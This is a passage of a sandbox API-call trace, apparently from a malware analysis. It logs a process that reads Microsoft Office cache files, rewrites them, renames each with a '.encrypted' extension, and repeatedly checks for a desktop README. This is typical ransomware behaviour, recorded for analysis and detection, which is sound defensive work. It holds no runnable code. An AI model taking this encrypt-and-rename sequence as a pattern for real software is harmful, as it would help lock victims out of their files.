ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 0 [0229.271] FindClose (in: hFindFile=0x94f0fb0 | out: hFindFile=0x94f0fb0) returned 1 [0229.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0229.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0229.272] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0229.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0229.272] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0229.275] GetFileType (hFile=0x280) returned 0x1 [0229.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0229.275] GetFileType (hFile=0x280) returned 0x1 [0229.275] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x91975 [0229.276] ReadFile (in: hFile=0x280, lpBuffer=0x3e22cd0, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x3e22cd0*, lpNumberOfBytesRead=0x2ee7d4*=0x91975, lpOverlapped=0x0) returned 1 [0229.288] CloseHandle (hObject=0x280) returned 1 [0229.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0229.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0229.343] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0229.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0229.343] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0229.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0229.343] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0229.349] GetFileType (hFile=0x280) returned 0x1 [0229.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0229.349] GetFileType (hFile=0x280) returned 0x1 [0229.349] WriteFile (in: hFile=0x280, lpBuffer=0x40fac88*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x40fac88*, lpNumberOfBytesWritten=0x2ee7c4*=0x91980, lpOverlapped=0x0) returned 1 [0229.363] CloseHandle (hObject=0x280) returned 1 [0229.363] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0229.363] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.encrypted", lpFilePart=0x0) returned 0x55 [0229.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0229.363] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0x6e418980, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x91980)) returned 1 [0229.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0229.363] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.encrypted")) returned 1 [0229.364] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", lpFilePart=0x0) returned 0x4b [0229.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0229.364] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0229.365] GetFileType (hFile=0x280) returned 0x1 [0229.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0229.365] GetFileType (hFile=0x280) returned 0x1 [0229.365] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0xd79282 [0229.408] ReadFile (in: hFile=0x280, lpBuffer=0x5a21018, nNumberOfBytesToRead=0xd79282, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x5a21018*, lpNumberOfBytesRead=0x2ee7d4*=0xd79282, lpOverlapped=0x0) returned 1 [0229.823] CloseHandle (hObject=0x280) returned 1 [0231.212] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0231.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0231.213] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0231.213] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", lpFilePart=0x0) returned 0x4b [0231.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0231.214] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0231.221] GetFileType (hFile=0x280) returned 0x1 [0231.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0231.221] GetFileType (hFile=0x280) returned 0x1 [0231.221] WriteFile (in: hFile=0x280, lpBuffer=0xc551018*, nNumberOfBytesToWrite=0xd79290, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0xc551018*, lpNumberOfBytesWritten=0x2ee7c4*=0xd79290, lpOverlapped=0x0) returned 1 [0231.567] CloseHandle (hObject=0x280) returned 1 [0231.567] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", lpFilePart=0x0) returned 0x4b [0231.567] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.encrypted", lpFilePart=0x0) returned 0x55 [0231.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0231.567] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x6f912b60, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xd79290)) returned 1 [0231.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0231.568] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.encrypted")) returned 1 [0231.570] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0231.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0231.570] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0231.570] GetFileType (hFile=0x280) returned 0x1 [0231.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0231.570] GetFileType (hFile=0x280) returned 0x1 [0231.570] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x15b5 [0231.570] ReadFile (in: hFile=0x280, lpBuffer=0x224ae2c, nNumberOfBytesToRead=0x15b5, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x224ae2c*, lpNumberOfBytesRead=0x2ee7d4*=0x15b5, lpOverlapped=0x0) returned 1 [0231.572] CloseHandle (hObject=0x280) returned 1 [0231.712] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0231.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0231.712] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0231.713] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0231.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0231.713] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0231.713] GetFileType (hFile=0x280) returned 0x1 [0231.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0231.713] GetFileType (hFile=0x280) returned 0x1 [0231.713] WriteFile (in: hFile=0x280, lpBuffer=0x229ed54*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x229ed54*, lpNumberOfBytesWritten=0x2ee7c4*=0x15c0, lpOverlapped=0x0) returned 1 [0231.715] CloseHandle (hObject=0x280) returned 1 [0231.715] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0231.715] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.encrypted", lpFilePart=0x0) returned 0x56 [0231.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0231.715] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x6fa8f920, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x15c0)) returned 1 [0231.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0231.715] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.encrypted")) returned 1 [0231.716] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0231.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0231.716] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0231.716] GetFileType (hFile=0x280) returned 0x1 [0231.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0231.717] GetFileType (hFile=0x280) returned 0x1 [0231.717] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x333 [0231.717] ReadFile (in: hFile=0x280, lpBuffer=0x22a0c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x22a0c44*, lpNumberOfBytesRead=0x2ee7d4*=0x333, lpOverlapped=0x0) returned 1 [0232.230] CloseHandle (hObject=0x280) returned 1 [0232.300] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0232.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0232.300] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0232.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0232.300] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0232.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0232.300] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.302] GetFileType (hFile=0x280) returned 0x1 [0232.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0232.302] GetFileType (hFile=0x280) returned 0x1 [0232.302] WriteFile (in: hFile=0x280, lpBuffer=0x224f738*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x224f738*, lpNumberOfBytesWritten=0x2ee798*=0x340, lpOverlapped=0x0) returned 1 [0232.303] CloseHandle (hObject=0x280) returned 1 [0232.303] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0232.304] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.encrypted", lpFilePart=0x0) returned 0x59 [0232.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0232.304] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x70010c00, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x340)) returned 1 [0232.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0232.304] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.encrypted")) returned 1 [0232.305] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0232.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0232.305] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.306] GetFileType (hFile=0x280) returned 0x1 [0232.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0232.306] GetFileType (hFile=0x280) returned 0x1 [0232.306] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x2488 [0232.306] ReadFile (in: hFile=0x280, lpBuffer=0x2250aec, nNumberOfBytesToRead=0x2488, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x2250aec*, lpNumberOfBytesRead=0x2ee7d4*=0x2488, lpOverlapped=0x0) returned 1 [0232.309] CloseHandle (hObject=0x280) returned 1 [0232.332] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0232.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0232.332] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0232.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0232.332] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", 